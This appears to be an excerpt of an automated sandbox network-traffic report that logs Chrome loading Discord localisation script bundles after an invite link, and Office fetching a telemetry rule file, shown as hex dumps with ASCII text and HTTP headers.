                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 69 6c 20 79 6f 75 20 65 6e 61 62 6c 65 20 69 74 2e 22 2c 22 39 66 6d 58 57 46 22 3a 22 59 6f 75 20 68 61 76 65 20 61 20 76 65 72 69 66 69 65 64 20 65 6d 61 69 6c 2e 22 2c 22 38 50 37 4d 58 31 22 3a 22 53 6f 72 72 79 20 3a 28 22 2c 22 53 78 73 42 46 42 22 3a 22 43 61 6e 20 79 6f 75 20 74 65 6c 6c 20 75 73 20 6d 6f 72 65 3f 22 2c 22 49 66 34 69 54 55 22 3a 5b 5b 36 2c 22 73 75 62 73 63 72 69 62 65 72 43 6f 75 6e 74 22 2c 7b 22 3d 31 22 3a 5b 5b 37 5d 2c 22 20 42 6f 6f 73 74 22 5d 2c 22 6f 74 68 65 72 22 3a 5b 5b 37 5d 2c 22 20 42 6f 6f 73 74 73 22 5d 7d 2c 30 2c 22 63 61 72 64 69 6e 61 6c 22 5d 5d 2c 22 30 68 37 62 78 38 22 3a 22 45 6e 61 62 6c 65 20 48 61 72 64 77 61 72 65 20 53 63 61 6c 69 6e 67 22 2c 22 50 65 58 68 67 49 22 3a 22 53 61 76 65 20 49 6d 61
                                                                                                                                                                                                                                                                                    Data Ascii: il you enable it.","9fmXWF":"You have a verified email.","8P7MX1":"Sorry :(","SxsBFB":"Can you tell us more?","If4iTU":[[6,"subscriberCount",{"=1":[[7]," Boost"],"other":[[7]," Boosts"]},0,"cardinal"]],"0h7bx8":"Enable Hardware Scaling","PeXhgI":"Save Ima
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 69 6c 6c 69 61 6e 63 65 2e 22 2c 22 66 69 4c 74 4a 69 22 3a 22 4e 69 74 72 6f 20 6d 65 6d 62 65 72 73 20 67 65 74 20 65 61 72 6c 79 20 62 65 74 61 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 52 65 6d 69 78 20 74 6f 6f 6c 2e 20 4a 6f 69 6e 20 4e 69 74 72 6f 20 74 6f 20 63 72 65 61 74 65 20 61 6e 64 20 73 68 61 72 65 20 79 6f 75 72 20 6f 77 6e 20 6d 65 6d 65 73 20 77 69 74 68 69 6e 20 74 68 65 20 6d 6f 62 69 6c 65 20 61 70 70 2c 20 61 6e 64 20 6d 75 63 68 20 6d 6f 72 65 21 22 2c 22 31 77 43 48 34 4f 22 3a 22 59 6f 75 20 6e 65 65 64 20 74 6f 20 66 69 6c 6c 20 6f 75 74 20 61 6e 79 20 65 6d 70 74 79 20 74 69 65 72 73 20 74 6f 20 70 72 65 76 69 65 77 20 77 68 61 74 20 65 76 65 72 79 74 68 69 6e 67 20 6c 6f 6f 6b 73 20 6c 69 6b 65 22 2c 22 31 58 75 66 63 6e 22
                                                                                                                                                                                                                                                                                    Data Ascii: illiance.","fiLtJi":"Nitro members get early beta access to the Remix tool. Join Nitro to create and share your own memes within the mobile app, and much more!","1wCH4O":"You need to fill out any empty tiers to preview what everything looks like","1Xufcn"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 6f 72 74 65 64 2e 22 2c 22 52 65 2f 36 34 65 22 3a 22 53 65 6c 65 63 74 20 61 20 63 68 61 6e 6e 65 6c 22 2c 22 76 54 56 43 35 65 22 3a 5b 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 69 6e 73 74 61 6c 6c 65 64 41 70 70 6c 69 63 61 74 69 6f 6e 4e 61 6d 65 22 5d 5d 5d 2c 22 20 68 61 73 20 62 65 65 6e 20 61 75 74 68 6f 72 69 7a 65 64 20 61 6e 64 20 61 64 64 65 64 20 74 6f 20 79 6f 75 72 20 61 70 70 73 21 22 5d 2c 22 57 49 44 45 31 4e 22 3a 22 50 65 72 6d 69 73 73 69 6f 6e 73 22 2c 22 41 56 47 41 6b 35 22 3a 22 54 77 69 74 63 68 20 28 49 6e 74 65 67 72 61 74 69 6f 6e 29 22 2c 22 75 35 44 55 72 4b 22 3a 22 45 64 69 74 20 43 68 61 6e 6e 65 6c 22 2c 22 6e 38 6e 55 34 65 22 3a 22 57 61 76 65 22 2c 22 49 44 36 34 2f 66 22 3a 22 68 61 72 64 77 61 72 65 22 2c 22 63 73 38
                                                                                                                                                                                                                                                                                    Data Ascii: orted.","Re/64e":"Select a channel","vTVC5e":[[8,"$b",[[1,"installedApplicationName"]]]," has been authorized and added to your apps!"],"WIDE1N":"Permissions","AVGAk5":"Twitch (Integration)","u5DUrK":"Edit Channel","n8nU4e":"Wave","ID64/f":"hardware","cs8
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 20 73 74 69 63 6b 65 72 20 22 2c 5b 38 2c 22 74 61 72 67 65 74 48 6f 6f 6b 22 2c 5b 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 74 61 72 67 65 74 22 5d 5d 5d 5d 5d 5d 2c 22 66 31 2b 6f 4e 6a 22 3a 22 4e 6f 20 61 76 61 74 61 72 20 73 65 74 22 2c 22 69 51 7a 51 73 37 22 3a 22 53 68 61 72 65 20 41 63 74 69 76 69 74 79 20 4c 6f 67 73 22 2c 22 63 45 74 73 36 2b 22 3a 22 54 68 69 73 20 70 6c 61 74 66 6f 72 6d 20 69 73 20 64 69 73 61 62 6c 65 64 22 2c 22 55 54 59 42 6a 59 22 3a 22 53 65 61 72 63 68 20 63 68 61 6e 6e 65 6c 73 22 2c 22 75 4e 6a 43 58 56 22 3a 5b 22 57 61 69 74 69 6e 67 20 66 6f 72 20 61 6e 6f 74 68 65 72 20 64 6f 77 6e 6c 6f 61 64 20 74 6f 20 70 61 75 73 65 20 e2 80 94 20 22 2c 5b 31 2c 22 70 72 6f 67 72 65 73 73 22 5d 2c 22 20 6f 66 20 22 2c 5b 31 2c
                                                                                                                                                                                                                                                                                    Data Ascii: sticker ",[8,"targetHook",[[8,"$b",[[1,"target"]]]]]],"f1+oNj":"No avatar set","iQzQs7":"Share Activity Logs","cEts6+":"This platform is disabled","UTYBjY":"Search channels","uNjCXV":["Waiting for another download to pause ",[1,"progress"]," of ",[1,
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 61 74 61 72 20 44 65 63 6f 72 61 74 69 6f 6e 22 2c 22 59 77 4a 6e 47 78 22 3a 22 45 6e 74 65 72 20 69 6e 76 69 74 65 20 63 6f 64 65 2e 2e 2e 22 2c 22 66 79 42 56 52 6b 22 3a 22 43 61 6e 63 65 6c 65 64 22 2c 22 35 52 35 33 52 6b 22 3a 22 43 75 73 74 6f 6d 20 50 72 6f 66 69 6c 65 73 22 2c 22 43 38 71 66 6b 70 22 3a 22 44 65 6c 65 74 65 20 41 76 61 74 61 72 22 2c 22 4f 6c 57 68 6a 49 22 3a 5b 22 53 74 72 65 61 6d 20 22 2c 5b 31 2c 22 67 61 6d 65 54 69 74 6c 65 22 5d 2c 22 20 74 6f 20 61 20 66 72 69 65 6e 64 20 66 6f 72 20 22 2c 5b 32 2c 22 73 74 72 65 61 6d 69 6e 67 44 75 72 61 74 69 6f 6e 52 65 71 75 69 72 65 6d 65 6e 74 22 5d 2c 22 20 6d 69 6e 75 74 65 73 20 61 6e 64 20 65 61 72 6e 20 22 2c 5b 38 2c 22 24 62 22 2c 5b 5b 31 2c 22 71 75 65 73 74 52 65 77 61
                                                                                                                                                                                                                                                                                    Data Ascii: atar Decoration","YwJnGx":"Enter invite code...","fyBVRk":"Canceled","5R53Rk":"Custom Profiles","C8qfkp":"Delete Avatar","OlWhjI":["Stream ",[1,"gameTitle"]," to a friend for ",[2,"streamingDurationRequirement"]," minutes and earn ",[8,"$b",[[1,"questRewa
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 6f 74 20 67 65 74 20 61 20 63 72 65 64 69 74 20 72 65 66 75 6e 64 20 69 66 20 79 6f 75 20 63 68 6f 6f 73 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 69 73 20 53 75 70 65 72 20 52 65 61 63 74 69 6f 6e 2e 22 2c 22 4d 6c 67 4c 46 78 22 3a 5b 5b 31 2c 22 6e 69 63 6b 6e 61 6d 65 30 22 5d 2c 22 20 61 6e 64 20 22 2c 5b 31 2c 22 6e 69 63 6b 6e 61 6d 65 31 22 5d 5d 2c 22 68 42 53 2f 7a 73 22 3a 22 41 6c 6c 6f 77 20 6d 65 6d 62 65 72 73 20 74 6f 20 63 72 65 61 74 65 20 69 6e 76 69 74 65 2d 6f 6e 6c 79 20 74 68 72 65 61 64 73 20 69 6e 20 74 68 65 73 65 20 63 68 61 6e 6e 65 6c 73 2e 22 2c 22 64 39 50 73 4d 6a 22 3a 22 4a 6f 69 6e 22 2c 22 74 78 38 43 6b 4a 22 3a 22 4c 6f 6f 6b 73 20 6c 69 6b 65 20 44 69 73 63 6f 72 64 20 68 61 73 20 63 72 61 73 68 65 64 20 75 6e 65 78
                                                                                                                                                                                                                                                                                    Data Ascii: ot get a credit refund if you choose to remove this Super Reaction.","MlgLFx":[[1,"nickname0"]," and ",[1,"nickname1"]],"hBS/zs":"Allow members to create invite-only threads in these channels.","d9PsMj":"Join","tx8CkJ":"Looks like Discord has crashed unex
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 63 75 73 74 6f 6d 20 73 74 61 74 75 73 2e 22 2c 22 33 2b 4c 4f 31 39 22 3a 22 4f 6c 64 65 72 20 50 6f 73 74 73 22 2c 22 47 5a 78 6f 55 56 22 3a 22 53 6f 72 74 20 50 6f 73 74 73 22 2c 22 37 4c 6b 77 71 4b 22 3a 22 43 6f 6e 6e 65 63 74 69 6e 67 e2 80 a6 22 2c 22 79 78 56 73 42 41 22 3a 22 55 70 6c 6f 61 64 20 61 20 66 69 6c 65 22 2c 22 59 65 4c 71 38 2f 22 3a 5b 5b 32 2c 22 72 65 6d 61 69 6e 69 6e 67 22 5d 2c 22 20 6f 66 20 22 2c 5b 32 2c 22 74 6f 74 61 6c 22 5d 2c 22 20 63 6f 70 69 65 73 20 6c 65 66 74 22 5d 2c 22 58 4b 6e 46 46 68 22 3a 22 59 6f 75 20 61 6e 64 20 79 6f 75 72 20 70 61 72 65 6e 74 73 20 73 65 65 20 74 68 65 20 65 78 61 63 74 20 73 61 6d 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 2c 22 6f 6f 4b 68 33 74 22 3a 22 4d 75 6c 74 69 70 6c 65 20
                                                                                                                                                                                                                                                                                    Data Ascii: custom status.","3+LO19":"Older Posts","GZxoUV":"Sort Posts","7LkwqK":"Connecting","yxVsBA":"Upload a file","YeLq8/":[[2,"remaining"]," of ",[2,"total"]," copies left"],"XKnFFh":"You and your parents see the exact same information.","ooKh3t":"Multiple
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 22 5d 7d 2c 30 2c 22 63 61 72 64 69 6e 61 6c 22 5d 2c 22 20 61 67 6f 22 5d 2c 22 55 34 4c 77 57 46 22 3a 22 54 68 69 73 20 77 69 6c 6c 20 64 65 74 65 72 6d 69 6e 65 20 77 68 65 74 68 65 72 20 6d 65 6d 62 65 72 73 20 77 68 6f 20 68 61 76 65 20 6e 6f 74 20 65 78 70 6c 69 63 69 74 6c 79 20 73 65 74 20 74 68 65 69 72 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 73 65 74 74 69 6e 67 73 20 72 65 63 65 69 76 65 20 61 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 66 6f 72 20 65 76 65 72 79 20 6d 65 73 73 61 67 65 20 73 65 6e 74 20 69 6e 20 74 68 69 73 20 73 65 72 76 65 72 20 6f 72 20 6e 6f 74 2e 22 2c 22 77 30 59 76 55 6c 22 3a 5b 5b 31 2c 22 75 73 65 72 4e 61 6d 65 22 5d 2c 22 20 69 73 20 69 6e 20 68 65 72 65 22 5d 2c 22 7a 71 61 73 32 39 22 3a 22 31 20 4d 6f 6e 74 68
                                                                                                                                                                                                                                                                                    Data Ascii: "]},0,"cardinal"]," ago"],"U4LwWF":"This will determine whether members who have not explicitly set their notification settings receive a notification for every message sent in this server or not.","w0YvUl":[[1,"userName"]," is in here"],"zqas29":"1 Month
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 72 4d 2b 54 6b 22 3a 5b 22 57 65 e2 80 99 76 65 20 61 64 64 65 64 20 6e 65 77 20 77 61 79 73 20 74 6f 20 70 61 79 20 66 6f 72 20 4e 69 74 72 6f 20 69 6e 20 22 2c 5b 31 2c 22 63 6f 75 6e 74 72 79 22 5d 2c 22 2e 20 22 2c 5b 38 2c 22 24 6c 69 6e 6b 22 2c 5b 22 4c 65 61 72 6e 20 4d 6f 72 65 22 5d 2c 5b 5b 31 2c 22 68 65 6c 70 43 65 6e 74 65 72 4c 69 6e 6b 22 5d 5d 5d 5d 2c 22 31 67 67 57 6c 5a 22 3a 22 4d 61 6e 61 67 65 22 2c 22 47 54 49 33 42 77 22 3a 22 41 72 67 65 6e 74 69 6e 65 20 50 65 73 6f 22 2c 22 67 61 69 66 77 63 22 3a 22 43 6c 6f 73 65 20 57 69 6e 64 6f 77 22 2c 22 59 2f 2b 53 76 4c 22 3a 5b 5b 38 2c 22 24 6c 69 6e 6b 22 2c 5b 5b 31 2c 22 75 73 65 72 6e 61 6d 65 22 5d 5d 2c 5b 5b 31 2c 22 75 73 65 72 6e 61 6d 65 4f 6e 43 6c 69 63 6b 22 5d 5d 5d 2c
                                                                                                                                                                                                                                                                                    Data Ascii: rM+Tk":["Weve added new ways to pay for Nitro in ",[1,"country"],". ",[8,"$link",["Learn More"],[[1,"helpCenterLink"]]]],"1ggWlZ":"Manage","GTI3Bw":"Argentine Peso","gaifwc":"Close Window","Y/+SvL":[[8,"$link",[[1,"username"]],[[1,"usernameOnClick"]]],


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    51192.168.2.549776162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC862OUTGET /assets/0a52c6142094387fceed.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC966INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 516
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0c0d8f8de9a-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "3803b930385aa579ddf315b689db895a"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 13 Nov 2024 23:09:25 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=td4cbpKV0Eaq%2FvlCwIbQNrDiTZ27Lq1u9Vf7XIdHBgDG9HXB8yI92wMPNOZn5O9srNBm%2B0Rkrtu%2B%2FRdi4yajA7NYSJ5jRtU8mM96ymj0d%2Bsv%2FhuRsRJqp82GZbls"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC403INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 38 35 37 37 22 5d 2c 7b 37 37 32 34 31 36 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 61 2c 6f 29 7b 6f 2e 72 28 61 29 2c 61 2e 64 65 66 61 75 6c 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 6f 66 61 7a 53 55 22 3a 22 45 6e 74 65 6e 64 69 64 6f 22 2c 22 4b 55 46 73 4c 69 22 3a 22 5c 78 61 31 45 6c 20 63 61 6d 62 69 6f 20 66 75 65 20 68 65 63 68 6f 21 22 2c 22 79 51 66 4c 77 4d 22 3a 22 44 69 73 63 6f 72 64 20 65 73 74 5c 78 65 31 20 63 6f 6e 66 69 67 75 72 61 64 6f 20 65 6e 20 45 73 70 61 5c 78 66 31 6f 6c
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["88577"],{772416:function(i,a,o){o.r(a),a.default=JSON.parse('{"ofazSU":"Entendido","KUFsLi":"\xa1El cambio fue hecho!","yQfLwM":"Discord est\xe1 configurado en Espa\xf1ol
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC113INData Raw: 72 20 44 69 73 63 6f 72 64 20 65 6e 20 45 73 70 61 5c 78 66 31 6f 6c 3f 22 2c 22 51 6b 47 4d 50 7a 22 3a 22 53 5c 78 65 64 22 2c 22 6a 4d 37 73 55 6c 22 3a 22 4e 6f 22 7d 27 29 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 30 61 35 32 63 36 31 34 32 30 39 34 33 38 37 66 63 65 65 64 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                                    Data Ascii: r Discord en Espa\xf1ol?","QkGMPz":"S\xed","jM7sUl":"No"}')}}]);//# sourceMappingURL=0a52c6142094387fceed.js.map


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    52192.168.2.54976913.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201240Z-178bfbc474bwlrhlhC1NYCy3kg00000004y000000000az8p
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    53192.168.2.549777162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC862OUTGET /assets/8143f89919f42e84b455.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC970INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 30717
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0c17ec65e6a-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "a318da370f7ee99d24ca9bbce1926baa"
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:14 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PxZ01o%2Fb%2BQV8h4SVXdOTe0CeP%2BAsDDS52a8HA0%2FUQfQ4PrFnw4IKaskNWrxFQ36Bo9kOLZSfNXj7Hk5bFO16EN63lYW%2FOGQALj6sIt%2FIkBvnheofzi56r04%2B8Ve"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC399INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 30 33 34 36 22 5d 2c 7b 32 33 37 32 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 74 29 7b 74 2e 72 28 6f 29 2c 6f 2e 64 65 66 61 75 6c 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 31 34 6f 39 5a 57 22 3a 22 47 6d 61 69 6c 22 2c 22 64 6e 4f 63 2f 76 22 3a 22 57 65 20 70 6c 61 79 20 74 6f 67 65 74 68 65 72 20 74 6f 20 77 69 6e 2c 20 72 61 6e 6b 20 75 70 2c 20 6f 72 20 62 65 61 74 20 63 68 61 6c 6c 65 6e 67 65 73 2e 22 2c 22 58 45 30 74 4c 53 22 3a 22 4a 6f 69 6e 20 41 70 70 6c 69 63 61 74 69 6f 6e
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20346"],{237267:function(e,o,t){t.r(o),o.default=JSON.parse('{"14o9ZW":"Gmail","dnOc/v":"We play together to win, rank up, or beat challenges.","XE0tLS":"Join Application
